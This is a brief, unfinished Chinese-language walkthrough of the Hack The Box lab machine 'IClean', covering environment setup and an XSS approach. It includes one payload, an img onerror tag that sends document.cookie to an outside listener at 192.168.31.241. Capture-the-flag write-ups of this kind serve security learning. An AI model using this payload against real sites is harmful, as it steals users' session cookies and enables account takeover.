hackthebox-IClean-walkthrough
IClean 获取flag
机器环境
目标机器
IP : 10.10.11.12
由于我想要使用windows中的浏览器和burpusuite进行攻击, 但是同时想要使用kali中的工具进行攻击,如何实现呢?
宿主机器
IP :
渗透思路
XSS
1
2
```bash <img src=x onerror=fetch("http://192.168.31.241:4321/"+document.cookie);>
```
cao, 遮掉网络不稳啊
玩玩ctf吧, 好像白天稳啊
本文由作者按照 CC BY 4.0 进行授权